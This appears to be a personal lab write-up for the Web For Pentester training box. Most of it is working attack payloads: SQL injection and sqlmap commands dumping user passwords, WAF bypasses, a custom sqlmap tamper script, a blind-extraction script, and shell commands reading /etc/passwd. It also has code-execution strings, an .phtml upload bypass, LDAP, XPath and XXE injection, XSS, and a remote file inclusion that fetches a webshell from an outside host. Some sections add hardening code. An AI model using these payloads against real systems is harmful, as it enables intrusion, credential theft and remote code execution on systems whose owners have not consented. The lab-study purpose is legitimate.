NEKO

Web For Pentester

2017/12/21

sqli

References:
http://lyx.dropsec.xyz/2015/06/20/sql%E6%B3%A8%E5%85%A5%E4%B9%8Btamper%E7%BB%95%E8%BF%87WAF%EF%BC%8C%E5%AE%89%E5%85%A8%E7%8B%97/
http://www.atomsec.org/%E5%AE%89%E5%85%A8/web_for_pentester_i-part-1/

ex1

String delimiter to close: '
Usable comment sequences: --+, -- -, %23

payload:

Manual injection

Find the number of columns (the query has 5, so order by 6 errors out):
http://10.10.10.156/sqli/example1.php?name=root' order by 6%23
Database name:
http://10.10.10.156/sqli/example1.php?name=' union select 1,2,database(),4,5 %23
Database: exercises
Table names:
http://10.10.10.156/sqli/example1.php?name=' union select 1,2,group_concat(table_name),4,5 from information_schema.tables where table_schema=database()%23
One table: users
Column names:
http://10.10.10.156/sqli/example1.php?name=' union select 1,2,group_concat(column_name),4,5 from information_schema.columns where table_name='users'%23
5 columns: id,name,age,groupid,passwd
Dump the data:
http://10.10.10.156/sqli/example1.php?name=' union select groupid,name,passwd,4,5 from users%23

sqlmap

kali64
Databases:
sqlmap -u 'http://10.10.10.156/sqli/example1.php?name=root' --dbs

Tables:
sqlmap -u 'http://10.10.10.156/sqli/example1.php?name=root' -D exercises --tables

Columns:
sqlmap -u 'http://10.10.10.156/sqli/example1.php?name=root' -D exercises -T users --columns

Dump:
sqlmap -u 'http://10.10.10.156/sqli/example1.php?name=root' -D exercises -T users --dump

ex2

String delimiter to close: '
Usable comment sequence: %23
WAF: blocks spaces (test: '%23 behaves normally, ' %23 does not)
WAF bypass:
Works: /**/, %09 (\t)
Does not work: %20, +, %2B, %0A (\n)
Bypass demo:

'/**/and/**/1=1%23
'or'1'='1'%23
'%09or%091=1%23

payload

Manual injection

Replace every space in the ex1 payloads with /**/ or %09.

sqlmap

A tamper script is needed.
Databases:
sqlmap -u 'http://10.10.10.156/sqli/example2.php?name=root' --dbs --tamper=space2comment.py
space2comment.py rewrites spaces as /**/; with a small change to the script it can emit %09 instead.
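The %09 variant of that tamper, as an added example: this is not sqlmap's space2comment.py or any other script shipped with sqlmap, but a standalone tamper written in the same shape. It keeps the quote tracking of space2comment.py, which only starts counting quotes after the first space so that the leading 1' with which sqlmap closes the application's own string is not taken for an opening quote, and swaps every space outside a quoted literal for %09. The file name space2tab.py in the usage comment is an assumption; sqlmap's own space2mysqlblank.py does the same job with a random choice of MySQL whitespace characters.

```python
# Standalone sqlmap-style tamper (added example, not shipped with sqlmap).
# Install (assumed name): copy to sqlmap/tamper/space2tab.py, then run
#   sqlmap -u 'http://10.10.10.156/sqli/example2.php?name=root' --dbs --tamper=space2tab
# Inside sqlmap __priority__ comes from lib.core.enums.PRIORITY; a plain
# integer stands in for it here so the module also runs outside sqlmap.
__priority__ = 0


def dependencies():
    """sqlmap calls this when the tamper is loaded; nothing extra is required."""
    pass


def tamper(payload, **kwargs):
    """Replace each space outside quoted literals with %09 (horizontal tab).

    MySQL accepts a tab wherever it accepts a space, while a filter that only
    looks for 0x20 never sees one. Spaces inside '...' or "..." are kept,
    because changing them would change the value being compared.

    >>> tamper("1' AND 1=1 AND 'a'='a")
    "1'%09AND%091=1%09AND%09'a'='a"
    """
    if not payload:
        return payload
    out = []
    quote = doublequote = seen_first_space = False
    for ch in payload:
        if not seen_first_space:
            # Nothing is tracked before the first space: the leading 1' that
            # closes the application's own quote is not an opening quote.
            if ch.isspace():
                seen_first_space = True
                out.append("%09")
                continue
        elif ch == "'":
            quote = not quote
        elif ch == '"':
            doublequote = not doublequote
        elif ch == " " and not (quote or doublequote):
            out.append("%09")
            continue
        out.append(ch)
    return "".join(out)
```

The same loop with "/**/" in place of "%09" is what space2comment.py does; the only reason to prefer the tab here is that the page found %09 and /**/ both pass while %20, + and %0A do not, so either tamper works against ex2 and ex3.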

ex3

String delimiter to close: '
Usable comment sequence: %23
WAF: blocks spaces
WAF bypass: /**/

'/**/or/**/1=1%23

payload

Manual injection

Same as ex2.

sqlmap

Same as ex2.

ex4

Numeric injection: id=2-1 returns the same row as id=1
No quote to close: id=1 and 1=1#
Usable comment sequences: #, -- -, --+, %23

id=1 or 1=1%23

payload

ex5

I couldn't see any difference from ex4.

ex6

I couldn't see any difference from ex5.

ex7

Numeric injection
No quote to close
Usable comment sequence: #
WAF: blocks spaces
WAF bypass: %0a

id=2%0aor%0a1=1#

payload

See ex2.

ex8

ORDER BY injection
Reference: https://www.cnblogs.com/REscan/p/6884278.html
Plain sort: order by name
Sort with backticks: order by %60name%60
This exercise uses the backtick form: the payload only returns rows when it closes the backtick itself (order=name%60%23), and with backtick quoting you cannot sort by column position, so order by 1%23 is out.

payload

手注

Don't know how.

sqlmap

Level 1 does not work.
Go straight to level 5:
sqlmap -u 'http://10.10.10.156/sqli/example8.php?order=name%60' --dbs --level=5

ex9

This exercise uses the plain sort form.

payload

手注

Write a script for blind injection.

sqlmap

sqlmap -u 'http://10.10.10.156/sqli/example9.php?order=name' --dbs
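The blind script the manual-injection note asks for, as an added example that is not part of the original writeup. ORDER BY takes an expression, so a CASE that flips the sort direction on a condition turns the row order into a one-bit oracle, and a binary search over the character code recovers a string one character per seven or so requests. It runs against a constructed in-memory SQLite table with the schema found in ex1 instead of the lab's MySQL; for the real target replace unicode() with ASCII() and sqlite_master with information_schema.tables, and URL-encode the expression into the order parameter. The hardened query at the end is also an assumption: ORDER BY cannot be a bound parameter, so the only fix is an allowlist of column names.

```python
import sqlite3

# Constructed sample data, assumed to match the users table enumerated in ex1.
conn = sqlite3.connect(":memory:")
conn.executescript("""
CREATE TABLE users (id INTEGER, name TEXT, age INTEGER, groupid INTEGER, passwd TEXT);
INSERT INTO users VALUES (1,'admin',30,1,'s3cr3t'),
                         (2,'hacker',25,2,'p4ss'),
                         (3,'neko',20,2,'meow');
""")


def query(order):
    """Mirrors example9.php: the order parameter is concatenated into ORDER BY.
    Returns the ids in the order the page would list them."""
    sql = "SELECT id, name, age FROM users ORDER BY " + order
    return [row[0] for row in conn.execute(sql)]


def oracle(condition):
    """One bit per request: sort by id when the condition holds, by -id when it
    does not, and read the answer off the first row."""
    payload = "(CASE WHEN (" + condition + ") THEN id ELSE -id END)"
    return query(payload)[0] == 1


def extract(subquery, max_len=64):
    """Recover the scalar result of `subquery` character by character."""
    out = ""
    for pos in range(1, max_len + 1):
        if not oracle("length((" + subquery + ")) >= " + str(pos)):
            break                                   # end of string reached
        lo, hi = 32, 126                            # printable ASCII range
        while lo < hi:                              # binary search on the code point
            mid = (lo + hi) // 2
            probe = ("unicode(substr((" + subquery + ")," + str(pos) + ",1)) > "
                     + str(mid))                    # MySQL: ASCII(SUBSTR(...))
            if oracle(probe):
                lo = mid + 1
            else:
                hi = mid
        out += chr(lo)
    return out


ALLOWED_ORDER = {"id", "name", "age"}


def safe_query(order):
    """Hardened form (assumption, not the lab's code): the column name is
    checked against an allowlist before it is spliced into the SQL."""
    if order not in ALLOWED_ORDER:
        raise ValueError("invalid order column: " + repr(order))
    return query(order)


if __name__ == "__main__":
    # MySQL equivalent of the first probe:
    #   SELECT group_concat(table_name) FROM information_schema.tables WHERE table_schema=database()
    print(extract("SELECT name FROM sqlite_master WHERE type='table'"))   # users
    print(extract("SELECT passwd FROM users WHERE name='admin'"))         # s3cr3t
```

Against the lab the same oracle works for ex8 as well once the closing backtick is in place, since the CASE expression is then just what follows `name` in the ORDER BY clause.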

Command Injection

Reference: https://securitytraning.com/command-injection-attacks-web-for-pentester/
command1 && command2   runs command1, then command2 only if command1 succeeded
command1 | command2    runs both; command1's output is piped into command2, so only command2's output is shown
command1 & command2    runs command1 in the background and command2 at the same time, so command2's output usually comes back first

ex1

Usable: ;, |, and %0a (\n newline). With | there must be a space after it, and only one command runs at a time.

payload

http://10.10.10.156/commandexec/example1.php?ip=127.0.0.1;ls;cat /etc/passwd 
http://10.10.10.156/commandexec/example1.php?ip=127.0.0.1%0als%0acat%20/etc/passwd
http://10.10.10.156/commandexec/example1.php?ip=127.0.0.1| ls

ex2

PHP regular expressions: http://www.jb51.net/article/36172.htm

Only an IP-address format is allowed, but the regex uses the m modifier, so ^ and $ match at line boundaries; a newline (%0a) bypasses it because only the first line has to match.

payload

http://10.10.10.156/commandexec/example2.php?ip=127.0.0.1%0als%0acat%20/etc/passwd

ex3


No m modifier here, so the anchors cover the whole string and the newline trick does not work.
Official explanation:
This time the preg_match function did a good validation on the user's input. However, the script didn't stop when an evil character was matched in the user's input. Instead, it only uses the header function to do a redirection, without a die function to stop the script.

So the attacking methods (';', '&&' and '|') still work on this one, but it will need a proxy like Burp Suite or nc/telnet to read the first response page.

PoC:

Use NC to exploit this vulnerability :

echo -e "GET /commandexec/example3.php?ip=127.0.0.1%26%26id HTTP/1.1\r\nHost: 10.10.10.129\r\nConnection: close\r\n\r\n" | nc [yourlab] 80

Using Telnet :-

% telnet [yourlab] 80
GET /commandexec/example3.php?ip=127.0.0.1|uname+-a HTTP/1.0
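The m-modifier difference between ex2 and ex3, as an added example in Python rather than the lab's PHP. PHP's /^...$/m is Python's re.MULTILINE, and the quirk that $ also matches just before a single trailing newline is shared by both engines (in PHP the D modifier or \z removes it). The IP pattern is my reconstruction of a four-dotted-number check, not the exact regex from the lab. ex3 is still exploitable for the reason the official explanation gives, the script keeps running after header(), so the fix there is an exit right after the redirect, not a better regex.

```python
import re

# Reconstructed (assumed) shape of the lab's IP check: four dotted numbers.
IP_RE = r"^\d{1,3}(?:\.\d{1,3}){3}$"


def accepted_with_m(ip):
    """commandexec/example2.php: with MULTILINE the anchors also match around
    embedded newlines, so only one line has to look like an address."""
    return re.search(IP_RE, ip, re.MULTILINE) is not None


def accepted_without_m(ip):
    """commandexec/example3.php: ^ is the start of the string and $ its end,
    except that $ still matches just before one trailing newline."""
    return re.search(IP_RE, ip) is not None


def accepted_strict(ip):
    """Hardened: fullmatch must consume the whole string, trailing newline
    included, so no newline survives into the value that reaches the shell."""
    return re.fullmatch(IP_RE, ip) is not None


def shell_commands(ip):
    """What `ping <ip>` becomes once the value is pasted into a shell command
    line: each newline starts a new command."""
    return [line for line in ip.split("\n") if line]


if __name__ == "__main__":
    attack = "127.0.0.1\nid"          # the %0a payload from ex2, decoded
    for check in (accepted_with_m, accepted_without_m, accepted_strict):
        print(check.__name__, check(attack), shell_commands(attack))
```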

file include

Official writeup: https://securitytraning.com/file-include-vulnerability-web-pentester/

ex1

Source:

if($_GET["page"]){
include($_GET["page"]);
}

The most basic file include.

Local include

http://10.10.10.156/fileincl/example1.php?page=../../../../../../etc/passwd

Remote include

Webshells of all kinds: http://file.hackersb.cn
http://10.10.10.156/fileincl/example1.php?page=http://file.hackersb.cn/webshell/php/PHPshell/Antichat%20Shell%20v1.3/Antichat Shell v1.3.php

Do whatever you want.

ex2

Source:

.php is appended to the parameter, and everything after a %00 byte is dropped when the file is opened, so this is a textbook null-byte truncation (PHP before 5.3.4).

Local include

http://10.10.10.156/fileincl/example2.php?page=../../../../../../etc/passwd%00

Remote include

Webshells of all kinds: http://file.hackersb.cn
http://10.10.10.156/fileincl/example2.php?page=http://file.hackersb.cn/webshell/php/PHPshell/Antichat%20Shell%20v1.3/Antichat Shell v1.3.php%00

code injection

Reference: http://wg135.github.io/blog/2016/03/18/pentestlab-web-for-pentester-code-injection/

ex1

Source:

Uses the eval() function.

payload

Just close the string properly:
http://10.10.10.156/codeexec/example1.php?name=hacker"; system('id'); echo "
Or leave it open and comment out the rest:
http://10.10.10.156/codeexec/example1.php?name=hacker";system('ls');%23
http://10.10.10.156/codeexec/example1.php?name=hacker".system('ls');%23

ex2

Source:

$order = $_GET["order"];
$result = mysql_query($sql);   // $sql is built earlier in the lab's source (not shown here)
if ($result) {
while ($row = mysql_fetch_assoc($result)) {
$users[] = new User($row['id'],$row['name'],$row['age']);
}
if (isset($order)) {
usort($users, create_function('$a, $b', 'return strcmp($a->'.$order.',$b->'.$order.');'));
}
}

payload

create_function() builds the comparator body from $order, so close the expression and break out:
http://10.10.10.156/codeexec/example2.php?order=id);}system('ls');%23

ex3

Source:

<?php
echo preg_replace($_GET["pattern"], $_GET["new"], $_GET["base"]);
?>

The e modifier:
When set, preg_replace() performs the normal backreference substitution in the replacement string, evaluates it as PHP code, and uses the result to replace the matched string.
Only preg_replace() uses this modifier; other PCRE functions ignore it.

payload

http://10.10.10.156/codeexec/example3.php?new=system('ls')&pattern=/lamer/e&base=Hello lamer

ex4

Source:

assert(trim("'".$_GET['name']."'"));
echo "Hello ".htmlentities($_GET['name']);

assert() evaluates the string it is given as PHP code, which gives code execution. Mind the quoting: the input is wrapped in single quotes before trim(), so the payload closes that quote, concatenates the call, and reopens it.

payload

http://10.10.10.156/codeexec/example4.php?name=hacker'.system("ls").'

file upload

ex1

Source:

No checks at all: upload a one-line PHP webshell directly and connect to it with China Chopper (菜刀).
You can also just upload a full webshell.

ex2

源码:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
<?php
if(isset($_FILES['image']))
{
$dir = '/var/www/upload/images/';
$file = basename($_FILES['image']['name']);
if (preg_match('/\.php$/',$file)) {
DIE("NO PHP");
}
if(move_uploaded_file($_FILES['image']['tmp_name'], $dir . $file))
{
echo 'Upload done !';
echo 'Your file can be found <a href="/upload/images/'.htmlentities($file).'">here</a>';
}
else
{
echo 'Upload failed';
}
}
?>

The filter rejects only names ending in .php, but .phtml is also executed as PHP on this box, so renaming the file to .phtml gets it through.
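The ex2 filter beside an allowlist version, as an added example in Python rather than the lab's PHP. blacklist_check() reproduces preg_match('/\.php$/') exactly; allowlist_name() is my hardened replacement and not code from the lab: it accepts only a fixed set of image extensions, compares them case-insensitively, drops any directory part, and stores the file under a random name so the uploader never chooses what lands on disk. Which other extensions the server runs as PHP depends on its configuration; the page established .phtml for this box, and the case-sensitive regex also lets .PHP through, which only matters if the server maps it.

```python
import os
import re
import secrets


def blacklist_check(filename):
    """Mirrors preg_match('/\\.php$/', $file) from upload/example2.php.
    Returns True when the upload is accepted: only a literal trailing .php is refused."""
    return re.search(r"\.php$", filename) is None


ALLOWED_IMAGE_EXT = {"jpg", "jpeg", "png", "gif"}


def allowlist_name(filename):
    """Hardened replacement (assumption, not the lab's code). Returns the name
    to store the file under, or None to reject the upload."""
    base = os.path.basename(filename)          # strip any directory part
    _, dot, ext = base.rpartition(".")
    if not dot or ext.lower() not in ALLOWED_IMAGE_EXT:
        return None
    # The stored name is random: the user-supplied name never reaches the filesystem.
    return secrets.token_hex(16) + "." + ext.lower()


def bypass_candidates():
    """Names that pass the lab's check. Whether they execute is up to the
    server config; the page confirmed .phtml on this box."""
    return [n for n in ("shell.php", "shell.phtml", "shell.PHP") if blacklist_check(n)]
```

Checking the extension is only half of it: the stored file should also live outside the web root or under a directory where script execution is disabled, so that a mistake in the allowlist does not hand out code execution again.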

ldap injection

ex1

Official explanation:
In this first example, you connect to a LDAP server, using your username and password. In this instance, The LDAP server does not authenticate you, since your credentials are invalid.

However, some LDAP servers authorise NULL Bind: if null values are sent, the LDAP server will proceed to bind the connection, and the PHP code will think that the credentials are correct. To get the bind with 2 null values, you will need to completely remove this parameter from the query. If you keep something like username=&password= in the URL, these values will not work, since they won’t be null; instead, they will be empty.
Some LDAP-backed logins let a NULL bind through as authenticated.

payload

http://10.10.10.156/ldap/example1.php

ex2

wtf?:
http://10.10.10.156/ldap/example2.php?name=hacker)(cn=*))%00&password=asdfasdf
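What that payload does to the search filter, as an added example; the filter template is an assumption modelled on the name and password parameters, since the page does not show the PHP. Concatenating the raw name lets ) close the cn clause, (cn=*) add a clause that always matches, and a second ) close the outer &, after which %00 cuts off the password clause entirely in a C-based LDAP client, so only the username is ever checked. escape_filter_value() applies the RFC 4515 rules for filter values and is the fix; the NULL-bind case in ex1 is a server setting that escaping does not address.

```python
# Added example: LDAP filter injection from ldap/example2.php, reproduced offline.
FILTER_TEMPLATE = "(&(cn={name})(userPassword={password}))"   # assumed shape


def build_filter_unsafe(name, password):
    """Raw concatenation, as the vulnerable code presumably does."""
    return FILTER_TEMPLATE.format(name=name, password=password)


# RFC 4515: these characters must be written as \XX inside a filter value.
_ESCAPES = {"\\": r"\5c", "*": r"\2a", "(": r"\28", ")": r"\29", "\x00": r"\00"}


def escape_filter_value(value):
    """Escape a user-supplied value so it can only ever be compared, never parsed."""
    return "".join(_ESCAPES.get(ch, ch) for ch in value)


def build_filter_safe(name, password):
    return FILTER_TEMPLATE.format(name=escape_filter_value(name),
                                  password=escape_filter_value(password))


def effective_filter(raw):
    """A client that stores the filter as a C string stops at the first NUL byte,
    which is what the %00 at the end of the payload relies on."""
    return raw.split("\x00", 1)[0]


if __name__ == "__main__":
    name = "hacker)(cn=*))\x00"        # the page's payload, URL-decoded
    print(effective_filter(build_filter_unsafe(name, "asdfasdf")))   # (&(cn=hacker)(cn=*))
    print(build_filter_safe(name, "asdfasdf"))
```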

XML attacks

Course: https://www.ichunqiu.com/open/58939
XXE: XML External Entity Injection
XML: eXtensible Markup Language
DTD: Document Type Definition
XML entities:
1. General entities:
Used in the body of the XML document
Declaration:
1. <!ENTITY name "text">
2. <!ENTITY name SYSTEM "URL of external file">
Reference:
&name;
2. Parameter entities:
Used only inside the DTD, in element and attribute declarations
Declaration:
1. <!ENTITY % name "text">
2. <!ENTITY % name SYSTEM "URL of external file">
Reference:
%name;

XXE impact: arbitrary file read, URL requests (SSRF), DoS, remote code execution (only when PHP has the expect extension loaded)

ex1

payload

http://10.10.10.156/xml/example1.php?xml=%3C%21DOCTYPE%20test%20%5B%3C%21ENTITY%20xxe%20SYSTEM%20%22file%3A%2f%2f%2fetc%2fpasswd%22%3E%5D%3E%3Ctest%3E%26xxe%3B%3C%2ftest%3E
原形式:
http://10.10.10.156/xml/example1.php?xml=<!DOCTYPE test [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><test>&xxe;</test>

ex2

orz

payload

http://10.10.10.156/xml/example2.php?name=' or 1=1]%00
The ] closes an XPath predicate, so this one is XPath injection rather than XXE: the quote ends the string, or 1=1 makes the predicate true, and %00 truncates whatever follows.

XSS

ex1

http://10.10.10.156/xss/example1.php?name=<script>alert('neko')</script>

ex2

http://10.10.10.156/xss/example2.php?name=<img src=x onerror=alert('neko')>

ex3

http://10.10.10.156/xss/example3.php?name=<img src=x onerror=alert('neko')>

ex4

http://10.10.10.156/xss/example4.php?name=<img src=x onerror=alert('neko')>

ex5

alert is filtered; use confirm() or prompt() instead.
http://10.10.10.156/xss/example5.php?name=<svg onload=confirm('neko')>
http://10.10.10.156/xss/example5.php?name=<svg onload=prompt('neko')>

ex6

The value is echoed inside a JavaScript string in a <script>...</script> block (check the page source), so close the string and inject a statement.
http://10.10.10.156/xss/example6.php?name=";alert('neko');"

ex7

http://10.10.10.156/xss/example7.php?name=";alert('neko');"

ex8

This one is neat: the injection point is the URL path itself, which is reflected inside a quoted attribute, so "> closes it.
http://10.10.10.156/xss/example8.php/"><script>alert('neko')</script>

ex9

http://10.10.10.156/xss/example9.php#<onload=alert('xss')>
Displays in the IE browser.

Original author: n3k0

Published: December 21st 2017, 6:17:53
